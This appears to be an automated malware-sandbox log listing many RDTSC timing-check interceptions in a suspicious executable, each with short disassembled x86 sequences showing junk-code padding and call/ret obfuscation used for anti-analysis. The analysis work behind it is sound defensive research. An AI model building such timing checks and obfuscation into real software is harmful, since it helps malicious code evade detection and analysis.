Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E2011 second address: 13E201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E201A second address: 13E201E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13AB320 second address: 13AB324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13AB324 second address: 13AB32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13AB32A second address: 13AB336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA94CE91926h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E5175 second address: 13E5179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E55FB second address: 13E55FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E55FF second address: 13E5623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA94CE93539h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E5867 second address: 13E587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA94CE91926h 0x0000000a popad 0x0000000b jng 00007FA94CE9192Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E587A second address: 13E58A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jne 00007FA94CE93530h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA94CE9352Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EA13F second address: 13EA144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EA144 second address: 13EA14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E96B8 second address: 13E96C2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA94CE91932h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E96C2 second address: 13E96C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E9DB4 second address: 13E9DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA94CE91926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E9DC5 second address: 13E9DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E9DC9 second address: 13E9DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13E9DDE second address: 13E9DE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED4C0 second address: 13ED4CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA94CE91926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED570 second address: 13ED580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE9352Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED580 second address: 13ED595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jnc 00007FA94CE9192Eh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED595 second address: 13ED5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jc 00007FA94CE93526h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FA94CE93538h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED5C4 second address: 13ED60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FA94CE91928h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 add dword ptr [ebp+122D1CBCh], ebx 0x00000027 call 00007FA94CE91929h 0x0000002c jmp 00007FA94CE9192Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED60B second address: 13ED60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED60F second address: 13ED615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED966 second address: 13ED970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA94CE93526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED970 second address: 13ED983 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ED983 second address: 13ED99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA94CE93537h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EE310 second address: 13EE331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EE4B9 second address: 13EE4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EE6D5 second address: 13EE6DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F068A second address: 13F068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13EF5EE second address: 13EF5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F0C8C second address: 13F0C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F0C92 second address: 13F0CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007FA94CE9192Dh 0x0000000c nop 0x0000000d call 00007FA94CE9192Ah 0x00000012 add edi, 7262B4DFh 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b add esi, 35A052E9h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007FA94CE91928h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D32ACh], eax 0x00000043 xchg eax, ebx 0x00000044 push esi 0x00000045 push edi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F0CEF second address: 13F0D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA94CE93528h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F1CD9 second address: 13F1CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F2734 second address: 13F2738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F2738 second address: 13F2792 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA94CE91928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f stc 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA94CE91928h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c xor dword ptr [ebp+122D1AE1h], eax 0x00000032 push 00000000h 0x00000034 mov di, 5A31h 0x00000038 mov esi, 266BC453h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA94CE91937h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F3C54 second address: 13F3CBB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA94CE9352Ch 0x00000008 jbe 00007FA94CE93526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA94CE93533h 0x00000017 pop edx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FA94CE93528h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 xor edi, 5B041046h 0x00000039 push 00000000h 0x0000003b add edi, 63C0DDC1h 0x00000041 push 00000000h 0x00000043 mov si, 89E1h 0x00000047 adc esi, 123B5213h 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F3CBB second address: 13F3CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d jp 00007FA94CE91955h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA94CE91932h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F39E4 second address: 13F39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13A6003 second address: 13A6009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F8FD4 second address: 13F8FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F94D2 second address: 13F94DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FA94CE91926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FA5E1 second address: 13FA5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13F58A6 second address: 13F58AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FFAC3 second address: 13FFAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FFAC7 second address: 13FFAD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FFAD7 second address: 13FFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FFADD second address: 13FFB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 or di, 1E8Ah 0x0000000c push 00000000h 0x0000000e je 00007FA94CE91928h 0x00000014 push ebx 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FA94CE91928h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 xchg eax, esi 0x00000033 jmp 00007FA94CE91935h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FFB2F second address: 13FFB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ACDD7 second address: 13ACDDE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13ACDDE second address: 13ACDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FA7D7 second address: 13FA7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1404113 second address: 1404117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1404117 second address: 140411D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FDBD9 second address: 13FDBDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FDBDF second address: 13FDBFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE91931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FEB42 second address: 13FEB48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 1405099 second address: 140509D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FDBFA second address: 13FDC17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA94CE93536h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140509D second address: 140511D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA94CE91938h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2D98h], eax 0x00000015 or dword ptr [ebp+122D31D3h], ebx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FA94CE91928h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov edi, 6317AEC3h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007FA94CE91928h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140511D second address: 140512D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 13FEC22 second address: 13FEC2C instructions: 0x00000000 rdtsc 0x00000002 je 00007FA94CE91926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140343B second address: 140343F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140611A second address: 140611E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140611E second address: 140612C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FA94CE93526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140612C second address: 1406130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140719D second address: 14071A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14071A3 second address: 14071A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14071A9 second address: 14071AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14062C6 second address: 14062CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14062CA second address: 14062ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA94CE93537h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A49B second address: 140A4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A4A5 second address: 140A4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A4AB second address: 140A4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140855A second address: 14085F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FA94CE93526h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FA94CE93528h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA94CE93528h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a call 00007FA94CE93530h 0x0000004f mov bx, si 0x00000052 pop edi 0x00000053 mov bx, di 0x00000056 mov dword ptr fs:[00000000h], esp 0x0000005d mov ebx, 368724C1h 0x00000062 mov eax, dword ptr [ebp+122D0169h] 0x00000068 stc 0x00000069 push FFFFFFFFh 0x0000006b mov ebx, dword ptr [ebp+122D1B42h] 0x00000071 nop 0x00000072 pushad 0x00000073 jns 00007FA94CE93528h 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A4B0 second address: 140A4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 140A4B6 second address: 140A4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14085F4 second address: 14085F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	RDTSC instruction interceptor: First address: 14085F8 second address: 1408604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
